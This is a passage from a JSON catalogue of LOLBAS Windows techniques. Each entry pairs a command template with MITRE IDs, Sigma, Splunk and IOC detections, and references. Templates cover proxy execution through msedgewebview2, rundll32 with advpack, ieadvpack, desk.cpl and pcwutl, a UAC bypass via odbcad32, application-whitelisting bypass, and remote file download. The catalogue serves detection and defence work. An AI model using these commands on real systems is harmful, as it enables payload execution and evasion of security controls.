--utility-cmd-prefix=\"{CMD}\"","description":"This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified command as its subprocess.","usecase":"Proxy execution of binary","mitre":["T1218.015"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\114.0.1823.43\\msedgewebview2.exe","C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\131.0.2903.70\\msedgewebview2.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml"},{"type":"IOC","value":"msedgewebview2.exe spawned with any of the following: --gpu-launcher, --utility-cmd-prefix, --renderer-cmd-prefix, --browser-subprocess-path"}],"references":["https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf","https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/"]},{"id":"lolbas:msedgewebview2-exe:2","toolId":"lolbas:msedgewebview2-exe","toolName":"msedgewebview2.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher=\"{CMD}\"","description":"This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified command as its subprocess.","usecase":"Proxy execution of binary","mitre":["T1218.015"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\114.0.1823.43\\msedgewebview2.exe","C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\131.0.2903.70\\msedgewebview2.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml"},{"type":"IOC","value":"msedgewebview2.exe spawned with any of the following: --gpu-launcher, --utility-cmd-prefix, --renderer-cmd-prefix, --browser-subprocess-path"}],"references":["https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf","https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/"]},{"id":"lolbas:msedgewebview2-exe:3","toolId":"lolbas:msedgewebview2-exe","toolName":"msedgewebview2.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msedgewebview2.exe --no-sandbox --renderer-cmd-prefix=\"{CMD}\"","description":"This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified command as its subprocess.","usecase":"Proxy execution of binary","mitre":["T1218.015"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\114.0.1823.43\\msedgewebview2.exe","C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\131.0.2903.70\\msedgewebview2.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml"},{"type":"IOC","value":"msedgewebview2.exe spawned with any of the following: --gpu-launcher, --utility-cmd-prefix, --renderer-cmd-prefix, --browser-subprocess-path"}],"references":["https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf","https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/"]},{"id":"lolbas:odbcad32-exe:0","toolId":"lolbas:odbcad32-exe","toolName":"odbcad32.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"odbcad32.exe","description":"Launch odbcad32.exe GUI, click 'Tracing' tab, click 'Browsing' button, enter abitrary command in the File Dialog's path, press enter.","usecase":"Execute a binary as a high-integrity process without a UAC prompt.","mitre":["T1548.002"],"privilege":"user","fullPath":["c:\\windows\\system32\\odbcad32.exe","c:\\windows\\syswow64\\odbcad32.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"odbcad32.exe spawning unexpected child processes."}],"references":["https://medium.com/@thebinaryhashira/living-off-the-land-and-living-above-uac-6a66738d225c","https://lolbas-project.github.io/lolbas/Binaries/odbcad32/"]},{"id":"lolbas:setupugc-exe:0","toolId":"lolbas:setupugc-exe","toolName":"setupugc.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"setupugc.exe specialize","description":"By first setting a command to a specific registry under `Setup-Unattend-Settings`, e.g. via: `reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\UnattendSettings\\Setup-Unattend-Settings\\RunSynchronous\\1\" /v Path /d \"{CMD}\" /f`, executing the following will cause it to execute the command.\n","usecase":"Execute binary through legitimate proxy","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\setupugc.exe","C:\\Windows\\SysWOW64\\setupugc.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"`setupugc.exe` spawning child processes outside of Windows Setup context. Legitimate parents are `setuphost.exe` or `setup.exe`."},{"type":"IOC","value":"Registry writes to `HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\UnattendSettings\\Setup-Unattend-Settings\\RunSynchronous\\` on a deployed system."}],"references":["https://strontic.github.io/xcyclopedia/library/setupugc.exe-3CFE082E8656AD66B5B9FFEB28CF4EC3.html","https://lolbas-project.github.io/lolbas/Binaries/setupugc/"]},{"id":"lolbas:setupugc-exe:1","toolId":"lolbas:setupugc-exe","toolName":"setupugc.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"setupugc.exe auditUser","description":"Same technique as above, but using the `auditUser` command-line option.","usecase":"Execute binary through legitimate proxy","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\setupugc.exe","C:\\Windows\\SysWOW64\\setupugc.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"`setupugc.exe` spawning child processes outside of Windows Setup context. Legitimate parents are `setuphost.exe` or `setup.exe`."},{"type":"IOC","value":"Registry writes to `HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\UnattendSettings\\Setup-Unattend-Settings\\RunSynchronous\\` on a deployed system."}],"references":["https://strontic.github.io/xcyclopedia/library/setupugc.exe-3CFE082E8656AD66B5B9FFEB28CF4EC3.html","https://lolbas-project.github.io/lolbas/Binaries/setupugc/"]},{"id":"lolbas:write-exe:0","toolId":"lolbas:write-exe","toolName":"write.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"write.exe","description":"Executes a binary provided in default value of `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\wordpad.exe`.","usecase":"Execute binary through legitimate proxy. This might be utilized to confuse detection solutions that rely on parent-child relationships.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\write.exe","C:\\Windows\\System32\\write.exe","C:\\Windows\\SysWOW64\\write.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Changes to HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\wordpad.exe"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_set/registry_set_persistence_app_paths.yml"}],"references":["https://gist.github.com/mblzk/b8c5ff7c2bd0fb2b385cc2fdd119874b","https://lolbas-project.github.io/lolbas/Binaries/write/"]},{"id":"lolbas:wt-exe:0","toolId":"lolbas:wt-exe","toolName":"wt.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wt.exe {CMD}","description":"Execute a command via Windows Terminal.","usecase":"Use wt.exe as a proxy binary to evade defensive counter-measures","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_<version_packageid>\\wt.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml"}],"references":["https://twitter.com/nas_bench/status/1552100271668469761","https://lolbas-project.github.io/lolbas/Binaries/wt/"]},{"id":"lolbas:advpack-dll:0","toolId":"lolbas:advpack-dll","toolName":"Advpack.dll","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"rundll32.exe advpack.dll,LaunchINFSection {PATH:.inf},DefaultInstall_SingleUser,1,","description":"Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).","usecase":"Run local or remote script(let) code through INF file specification.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\advpack.dll","c:\\windows\\syswow64\\advpack.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"references":["https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/","https://twitter.com/ItsReallyNick/status/967859147977850880","https://twitter.com/bohops/status/974497123101179904","https://twitter.com/moriarty_meng/status/977848311603380224","https://lolbas-project.github.io/lolbas/Libraries/Advpack/"]},{"id":"lolbas:advpack-dll:1","toolId":"lolbas:advpack-dll","toolName":"Advpack.dll","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"rundll32.exe advpack.dll,LaunchINFSection {PATH:.inf},,1,","description":"Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).","usecase":"Run local or remote script(let) code through INF file specification.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\advpack.dll","c:\\windows\\syswow64\\advpack.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"references":["https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/","https://twitter.com/ItsReallyNick/status/967859147977850880","https://twitter.com/bohops/status/974497123101179904","https://twitter.com/moriarty_meng/status/977848311603380224","https://lolbas-project.github.io/lolbas/Libraries/Advpack/"]},{"id":"lolbas:advpack-dll:2","toolId":"lolbas:advpack-dll","toolName":"Advpack.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe advpack.dll,RegisterOCX {PATH:.dll}","description":"Launch a DLL payload by calling the RegisterOCX function.","usecase":"Load a DLL payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\advpack.dll","c:\\windows\\syswow64\\advpack.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"references":["https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/","https://twitter.com/ItsReallyNick/status/967859147977850880","https://twitter.com/bohops/status/974497123101179904","https://twitter.com/moriarty_meng/status/977848311603380224","https://lolbas-project.github.io/lolbas/Libraries/Advpack/"]},{"id":"lolbas:advpack-dll:3","toolId":"lolbas:advpack-dll","toolName":"Advpack.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe advpack.dll,RegisterOCX {PATH:.exe}","description":"Launch an executable by calling the RegisterOCX function.","usecase":"Run an executable payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\advpack.dll","c:\\windows\\syswow64\\advpack.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"references":["https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/","https://twitter.com/ItsReallyNick/status/967859147977850880","https://twitter.com/bohops/status/974497123101179904","https://twitter.com/moriarty_meng/status/977848311603380224","https://lolbas-project.github.io/lolbas/Libraries/Advpack/"]},{"id":"lolbas:advpack-dll:4","toolId":"lolbas:advpack-dll","toolName":"Advpack.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32 advpack.dll, RegisterOCX {CMD}","description":"Launch command line by calling the RegisterOCX function.","usecase":"Run an executable payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\advpack.dll","c:\\windows\\syswow64\\advpack.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"references":["https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/","https://twitter.com/ItsReallyNick/status/967859147977850880","https://twitter.com/bohops/status/974497123101179904","https://twitter.com/moriarty_meng/status/977848311603380224","https://lolbas-project.github.io/lolbas/Libraries/Advpack/"]},{"id":"lolbas:desk-cpl:0","toolId":"lolbas:desk-cpl","toolName":"Desk.cpl","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe desk.cpl,InstallScreenSaver {PATH_ABSOLUTE:.scr}","description":"Launch an executable with a .scr extension by calling the InstallScreenSaver function.","usecase":"Launch any executable payload, as long as it uses the .scr extension.","mitre":["T1218.011"],"privilege":"user","fullPath":["C:\\Windows\\System32\\desk.cpl","C:\\Windows\\SysWOW64\\desk.cpl"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/file/file_event/file_event_win_new_src_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/940f89d43dbac5b7108610a5bde47cda0d2a643b/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml"}],"references":["https://vxug.fakedoma.in/zines/29a/29a7/Articles/29A-7.030.txt","https://twitter.com/pabraeken/status/998627081360695297","https://twitter.com/VakninHai/status/1517027824984547329","https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files","https://lolbas-project.github.io/lolbas/Libraries/Desk/"]},{"id":"lolbas:desk-cpl:1","toolId":"lolbas:desk-cpl","toolName":"Desk.cpl","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe desk.cpl,InstallScreenSaver {PATH_SMB:.scr}","description":"Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function.","usecase":"Launch any executable payload, as long as it uses the .scr extension.","mitre":["T1218.011"],"privilege":"user","fullPath":["C:\\Windows\\System32\\desk.cpl","C:\\Windows\\SysWOW64\\desk.cpl"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/file/file_event/file_event_win_new_src_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/940f89d43dbac5b7108610a5bde47cda0d2a643b/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml"}],"references":["https://vxug.fakedoma.in/zines/29a/29a7/Articles/29A-7.030.txt","https://twitter.com/pabraeken/status/998627081360695297","https://twitter.com/VakninHai/status/1517027824984547329","https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files","https://lolbas-project.github.io/lolbas/Libraries/Desk/"]},{"id":"lolbas:dfshim-dll:0","toolId":"lolbas:dfshim-dll","toolName":"Dfshim.dll","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL}","description":"Executes click-once-application from URL (trampoline for Dfsvc.exe, DotNet ClickOnce host)","usecase":"Use binary to bypass Application whitelisting","mitre":["T1127.002"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Dfsvc.exe"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf","https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe","https://lolbas-project.github.io/lolbas/Libraries/Dfshim/"]},{"id":"lolbas:ieadvpack-dll:0","toolId":"lolbas:ieadvpack-dll","toolName":"Ieadvpack.dll","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"rundll32.exe ieadvpack.dll,LaunchINFSection {PATH_ABSOLUTE:.inf},DefaultInstall_SingleUser,1,","description":"Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).","usecase":"Run local or remote script(let) code through INF file specification.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\ieadvpack.dll","c:\\windows\\syswow64\\ieadvpack.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"references":["https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/","https://twitter.com/pabraeken/status/991695411902599168","https://twitter.com/0rbz_/status/974472392012689408","https://lolbas-project.github.io/lolbas/Libraries/Ieadvpack/"]},{"id":"lolbas:ieadvpack-dll:1","toolId":"lolbas:ieadvpack-dll","toolName":"Ieadvpack.dll","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"rundll32.exe ieadvpack.dll,LaunchINFSection {PATH_ABSOLUTE:.inf},,1,","description":"Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).","usecase":"Run local or remote script(let) code through INF file specification.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\ieadvpack.dll","c:\\windows\\syswow64\\ieadvpack.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"references":["https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/","https://twitter.com/pabraeken/status/991695411902599168","https://twitter.com/0rbz_/status/974472392012689408","https://lolbas-project.github.io/lolbas/Libraries/Ieadvpack/"]},{"id":"lolbas:ieadvpack-dll:2","toolId":"lolbas:ieadvpack-dll","toolName":"Ieadvpack.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe ieadvpack.dll,RegisterOCX {PATH:.dll}","description":"Launch a DLL payload by calling the RegisterOCX function.","usecase":"Load a DLL payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\ieadvpack.dll","c:\\windows\\syswow64\\ieadvpack.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"references":["https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/","https://twitter.com/pabraeken/status/991695411902599168","https://twitter.com/0rbz_/status/974472392012689408","https://lolbas-project.github.io/lolbas/Libraries/Ieadvpack/"]},{"id":"lolbas:ieadvpack-dll:3","toolId":"lolbas:ieadvpack-dll","toolName":"Ieadvpack.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe ieadvpack.dll,RegisterOCX {PATH:.exe}","description":"Launch an executable by calling the RegisterOCX function.","usecase":"Run an executable payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\ieadvpack.dll","c:\\windows\\syswow64\\ieadvpack.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"references":["https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/","https://twitter.com/pabraeken/status/991695411902599168","https://twitter.com/0rbz_/status/974472392012689408","https://lolbas-project.github.io/lolbas/Libraries/Ieadvpack/"]},{"id":"lolbas:ieadvpack-dll:4","toolId":"lolbas:ieadvpack-dll","toolName":"Ieadvpack.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32 ieadvpack.dll, RegisterOCX {CMD}","description":"Launch command line by calling the RegisterOCX function.","usecase":"Run an executable payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\ieadvpack.dll","c:\\windows\\syswow64\\ieadvpack.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"references":["https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/","https://twitter.com/pabraeken/status/991695411902599168","https://twitter.com/0rbz_/status/974472392012689408","https://lolbas-project.github.io/lolbas/Libraries/Ieadvpack/"]},{"id":"lolbas:ieframe-dll:0","toolId":"lolbas:ieframe-dll","toolName":"Ieframe.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe ieframe.dll,OpenURL {PATH_ABSOLUTE:.url}","description":"Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.","usecase":"Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\ieframe.dll","c:\\windows\\syswow64\\ieframe.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/","https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/","https://twitter.com/bohops/status/997690405092290561","https://windows10dll.nirsoft.net/ieframe_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Ieframe/"]},{"id":"lolbas:mshtml-dll:0","toolId":"lolbas:mshtml-dll","toolName":"Mshtml.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe Mshtml.dll,PrintHTML {PATH_ABSOLUTE:.hta}","description":"Invoke an HTML Application via mshta.exe (note: pops a security warning and a print dialogue box).","usecase":"Launch an HTA application.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\mshtml.dll","c:\\windows\\syswow64\\mshtml.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://twitter.com/pabraeken/status/998567549670477824","https://windows10dll.nirsoft.net/mshtml_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Mshtml/"]},{"id":"lolbas:pcwutl-dll:0","toolId":"lolbas:pcwutl-dll","toolName":"Pcwutl.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe pcwutl.dll,LaunchApplication {PATH:.exe}","description":"Launch executable by calling the LaunchApplication function.","usecase":"Launch an executable.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\pcwutl.dll","c:\\windows\\syswow64\\pcwutl.dll"],"toolType":"Library","detection":[{"type":"Analysis","value":"https://redcanary.com/threat-detection-report/techniques/rundll32/"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://twitter.com/harr0ey/status/989617817849876488","https://windows10dll.nirsoft.net/pcwutl_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/"]},{"id":"lolbas:photoviewer-dll:0","toolId":"lolbas:photoviewer-dll","toolName":"PhotoViewer.dll","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"rundll32.exe \"C:\\Program Files\\Windows Photo Viewer\\PhotoViewer.dll\",ImageView_Fullscreen {REMOTEURL}","description":"Once executed, rundll32.exe will download the file at the specified URL to the user's INetCache folder using the Windows Photo Viewer DLL.","usecase":"Download file from remote location.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files\\Windows Photo Viewer\\PhotoViewer.dll","C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll"],"toolType":"Library","detection":[{"type":"IOC","value":"Execution of rundll32.exe with 'ImageView_Fullscreen' and a remote URL (containing '://') as an argument"}],"references":["https://lolbas-project.github.io/lolbas/Libraries/PhotoViewer/"]},{"id":"lolbas:scrobj-dll:0","toolId":"lolbas:scrobj-dll","toolName":"Scrobj.dll","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"rundll32.exe C:\\Windows\\System32\\scrobj.dll,GenerateTypeLib {REMOTEURL:.exe}","description":"Once executed, scrobj.dll attempts to load a file from the URL and saves it to INetCache.","usecase":"Download file from remote 